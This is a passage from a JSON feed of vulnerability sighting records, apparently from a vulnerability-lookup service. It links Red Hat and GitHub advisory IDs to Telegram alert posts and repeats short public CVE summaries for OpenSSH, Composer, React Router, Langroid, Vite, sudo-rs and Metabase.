"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4484", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "a8d4d5a3-a743-40fc-b63f-a6ff8f4addc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4469", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "98ee7392-acd7-41ef-a1db-fda86355b085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4479", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "1c48041b-1b21-4142-b0e8-b9f87e6c0048", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4312", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "4e1e7b21-2968-4bec-bddb-724bf383cb48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F8R-222P-6F5G", "type": "published-proof-of-concept", "source": "Telegram/YLjaHgOWqHy_GE2pMNrZj7K_RcmqTuBmFaJ1673d7IeXnQg", "content": "", "creation_timestamp": "2025-06-13T21:00:48.000000Z"}, {"uuid": "5b14a9f0-f231-4743-8b23-cbf66b5308f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4474", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "03769e6f-def2-4def-b411-5a62eb49200a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47F6-5GQ3-VX9C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12699", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-35241\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.\n\ud83d\udccf Published: 2024-06-10T21:19:47.123Z\n\ud83d\udccf Modified: 2025-04-21T15:20:35.089Z\n\ud83d\udd17 References:\n1. https://github.com/composer/composer/security/advisories/GHSA-47f6-5gq3-vx9c\n2. https://github.com/composer/composer/commit/b93fc6ca437da35ae73d667d0618749c763b67d4\n3. https://github.com/composer/composer/commit/ee28354ca8d33c15949ad7de2ce6656ba3f68704\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VLPJHM2WWSYU2F6KHW2BYFGYL4IGTKHC/\n5. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PO4MU2BC7VR6LMHEX4X7DKGHVFXZV2MC/", "creation_timestamp": "2025-04-21T16:03:07.000000Z"}, {"uuid": "2689e3bf-4489-46a8-b3ac-14d8aadc49db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPJ6-FHP6-MR6J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13366", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43865\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: React Router is a router for React. In versions on the 7.0 branch prior to version 7.5.2, it's possible to modify pre-rendered data by adding a header to the request. This allows to completely spoof its contents and modify all the values \u200b\u200bof the data object passed to the HTML. This issue has been patched in version 7.5.2.\n\ud83d\udccf Published: 2025-04-25T00:18:53.222Z\n\ud83d\udccf Modified: 2025-04-25T00:18:53.222Z\n\ud83d\udd17 References:\n1. https://github.com/remix-run/react-router/security/advisories/GHSA-cpj6-fhp6-mr6j\n2. https://github.com/remix-run/react-router/commit/c84302972a152d851cf5dd859ff332b354b70111\n3. https://github.com/remix-run/react-router/blob/e6c53a0130559b4a9bd47f9cf76ea5b08a69868a/packages/react-router/lib/server-runtime/routes.ts#L87", "creation_timestamp": "2025-04-25T01:10:55.000000Z"}, {"uuid": "2cf1f30e-3ac4-4bcf-8108-de041f3fb2bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8WWF-W4QM-GPQR", "type": "published-proof-of-concept", "source": "Telegram/kyHnhOwYkes5uzXbChXTm6dhL73790EjFu5sgO1QQxBWSxo", "content": "", "creation_timestamp": "2025-06-17T21:03:11.000000Z"}, {"uuid": "a3c4776d-a3aa-459f-90ed-561894c6a209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGFV-2362-JQ96", "type": "published-proof-of-concept", "source": "Telegram/Wkmo48b48G0HhmpT1hoWuZ2qGdeD3nRgP5J0NW5LvqYONP0", "content": "", "creation_timestamp": "2025-06-21T04:03:09.000000Z"}, {"uuid": "ec534488-f4ba-4809-abda-2e54dac80ca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJHG-3MRH-MM7H", "type": "published-proof-of-concept", "source": "Telegram/Wkmo48b48G0HhmpT1hoWuZ2qGdeD3nRgP5J0NW5LvqYONP0", "content": "", "creation_timestamp": "2025-06-21T04:03:09.000000Z"}, {"uuid": "85ba06ec-8f6f-4c56-b47c-68faab05a1ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CQV-PJ7F-PWPC", "type": "published-proof-of-concept", "source": "Telegram/3wlas6nRaFb_R1V-B1xEwrJrPKOz4CFQa-j0eVutc5pi--w", "content": "", "creation_timestamp": "2025-06-17T22:00:58.000000Z"}, {"uuid": "85cfaa66-92ee-4e3b-ac1a-bedc3127b198", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PW95-88FG-3J6F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14979", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46726\n\ud83d\udd25 CVSS Score: 7.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Langroid is a framework for building large-language-model-powered applications. Prior to version 0.53.4, a LLM application leveraging `XMLToolMessage` class may be exposed to untrusted XML input that could result in DoS and/or exposing local files with sensitive information. Version 0.53.4 fixes the issue.\n\ud83d\udccf Published: 2025-05-05T19:21:19.597Z\n\ud83d\udccf Modified: 2025-05-05T20:07:01.257Z\n\ud83d\udd17 References:\n1. https://github.com/langroid/langroid/security/advisories/GHSA-pw95-88fg-3j6f\n2. https://github.com/langroid/langroid/commit/36e7e7db4dd1636de225c2c66c84052b1e9ac3c3\n3. https://github.com/langroid/langroid/blob/df6227e6c079ec22bb2768498423148d6685acff/langroid/agent/xml_tool_message.py#L51-L52", "creation_timestamp": "2025-05-05T20:20:04.000000Z"}, {"uuid": "a189f793-a93a-4f68-9fb5-07571612fbbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859W-5945-R5V3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14557", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46565\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.\n\ud83d\udccf Published: 2025-05-01T17:20:29.773Z\n\ud83d\udccf Modified: 2025-05-02T17:38:55.291Z\n\ud83d\udd17 References:\n1. https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3\n2. https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb", "creation_timestamp": "2025-05-02T18:19:55.000000Z"}, {"uuid": "87049fdf-72cf-49e1-a3eb-28255c3acf03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9Q3-G4P5-5Q2R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16063", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46718\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: sudo-rs is a memory safe implementation of sudo and su written in Rust. Prior to version 0.2.6, users with limited sudo privileges (e.g. execution of a single command) can list sudo privileges of other users using the `-U` flag. This vulnerability allows users with limited sudo privileges to enumerate the sudoers file, revealing sensitive information about other users' permissions. Attackers can collect information that can be used to more targeted attacks. Systems where users either do not have sudo privileges or have the ability to run all commands as root through sudo (the default configuration on most systems) are not affected by this advisory. Version 0.2.6 fixes the vulnerability.\n\ud83d\udccf Published: 2025-05-12T14:54:24.925Z\n\ud83d\udccf Modified: 2025-05-12T22:06:49.474Z\n\ud83d\udd17 References:\n1. https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-w9q3-g4p5-5q2r\n2. https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.6", "creation_timestamp": "2025-05-12T22:29:14.000000Z"}, {"uuid": "4a33609f-9fe7-4768-969b-479e22aefe5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62R4-HW23-CC8V", "type": "published-proof-of-concept", "source": "Telegram/enKzt3bxSKd8zB2DxOAdSs1JHzkbkyRgEfAWm4z9IF02rbM", "content": "", "creation_timestamp": "2026-01-05T18:04:56.000000Z"}, {"uuid": "789bd74b-a1e4-408b-8ab5-5691c87fec29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6H7W-V2XR-MQVW", "type": "seen", "source": "Telegram/hVIsWvvgLiiM_GtF82joYNFY3TrnJxWWlKsVG9afGpT3z9w", "content": "", "creation_timestamp": "2026-01-03T14:32:26.000000Z"}, {"uuid": "8285165a-b7b6-40a9-ae56-e8f09ca3eb6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5RW-QVVP-5CGM", "type": "seen", "source": "Telegram/hVIsWvvgLiiM_GtF82joYNFY3TrnJxWWlKsVG9afGpT3z9w", "content": "", "creation_timestamp": "2026-01-03T14:32:26.000000Z"}, {"uuid": "a3c66fb9-97ba-44a8-a557-8b5bbaa40735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0034", "type": "seen", "source": "Telegram/taG3BJ9J_v6Qp7bxDZF1T7cokiFjegEW9dxPUyVryiZJ4SE", "content": "", "creation_timestamp": "2026-01-05T08:01:49.000000Z"}, {"uuid": "8eac4a82-3a2e-433d-a396-5c686ba92695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0036", "type": "seen", "source": "Telegram/taG3BJ9J_v6Qp7bxDZF1T7cokiFjegEW9dxPUyVryiZJ4SE", "content": "", "creation_timestamp": "2026-01-05T08:01:49.000000Z"}, {"uuid": "a0fcd57d-006c-419f-a809-c619f387a1e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0033", "type": "seen", "source": "Telegram/taG3BJ9J_v6Qp7bxDZF1T7cokiFjegEW9dxPUyVryiZJ4SE", "content": "", "creation_timestamp": "2026-01-05T08:01:49.000000Z"}, {"uuid": "b3d65a6a-b1f6-4261-8cc5-ca39cf977037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW39-R4H6-8J3X", "type": "published-proof-of-concept", "source": "Telegram/DFhOoz2ba5lY6tfZKWDQmHfJO-BCe0MWUTSMMxzWfmXNHIA", "content": "", "creation_timestamp": "2026-01-03T00:08:40.000000Z"}, {"uuid": "4520f40f-3219-4c79-87a8-3c6c88b26893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HVG-QW5Q-WQWP", "type": "published-proof-of-concept", "source": "Telegram/DFhOoz2ba5lY6tfZKWDQmHfJO-BCe0MWUTSMMxzWfmXNHIA", "content": "", "creation_timestamp": "2026-01-03T00:08:40.000000Z"}, {"uuid": "3998a533-2707-4ae9-b9c6-e62bb217359e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0034", "type": "seen", "source": "Telegram/Ln-Tijs8Mrus1yJJyoZ6KmT82kic7N_Q3bIXfA3ucf5IWpQ", "content": "", "creation_timestamp": "2026-01-05T08:01:26.000000Z"}, {"uuid": "0870696c-dfdb-4ef6-93f6-fa795e878d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0033", "type": "seen", "source": "Telegram/Ln-Tijs8Mrus1yJJyoZ6KmT82kic7N_Q3bIXfA3ucf5IWpQ", "content": "", "creation_timestamp": "2026-01-05T08:01:26.000000Z"}, {"uuid": "1db06059-1ee3-4cdb-9720-021aca15c5db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F737-2P93-G2CW", "type": "seen", "source": "Telegram/dnE6g3S2HF2ctEv4QL4AWKZnSnaJLWH3AV76rFV0fRF-qPg", "content": "", "creation_timestamp": "2026-01-05T22:07:46.000000Z"}, {"uuid": "ed727929-f2a0-495f-bd41-96a99c8b29e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4FQM-797G-7M6J", "type": "seen", "source": "Telegram/dnE6g3S2HF2ctEv4QL4AWKZnSnaJLWH3AV76rFV0fRF-qPg", "content": "", "creation_timestamp": "2026-01-05T22:07:46.000000Z"}, {"uuid": "14189635-7a48-47b2-bf4b-4173a1335e1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QX24-JHWJ-8W6X", "type": "seen", "source": "Telegram/dnE6g3S2HF2ctEv4QL4AWKZnSnaJLWH3AV76rFV0fRF-qPg", "content": "", "creation_timestamp": "2026-01-05T22:07:46.000000Z"}, {"uuid": "09adb785-9189-432e-985f-e73eea6887cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7X8-6R56-498R", "type": "published-proof-of-concept", "source": "Telegram/enKzt3bxSKd8zB2DxOAdSs1JHzkbkyRgEfAWm4z9IF02rbM", "content": "", "creation_timestamp": "2026-01-05T18:04:56.000000Z"}, {"uuid": "596be632-c05f-4bb3-b6cd-a285f3421dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R3W-4J8Q-PW98", "type": "published-proof-of-concept", "source": "Telegram/KhP08QO7_METb6I7HjASrP1eXHc6jEsXOl-U_rWhwWcwwg", "content": "", "creation_timestamp": "2025-12-08T18:48:31.000000Z"}, {"uuid": "d476d8cf-15ca-42a4-91d5-72637ccf4404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/37158", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/Taonauz/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-17T18:48:47.000000Z"}, {"uuid": "3920678f-8e09-479f-8b4f-5a0c7e24f564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FPPJ-VCM3-W229", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3116", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043e\u0442\u0447\u0435\u0442\u043e\u0432 Metabase \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e YAML-\u0444\u0430\u0439\u043b\u0430\n\nBDU:2026-05905\nCVE-2026-33725\n\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0438\u0437 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432. \u0412 \u0441\u0432\u044f\u0437\u0438 \u0441\u043e \u0441\u043b\u043e\u0436\u0438\u0432\u0448\u0435\u0439\u0441\u044f \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0438 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0430\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c 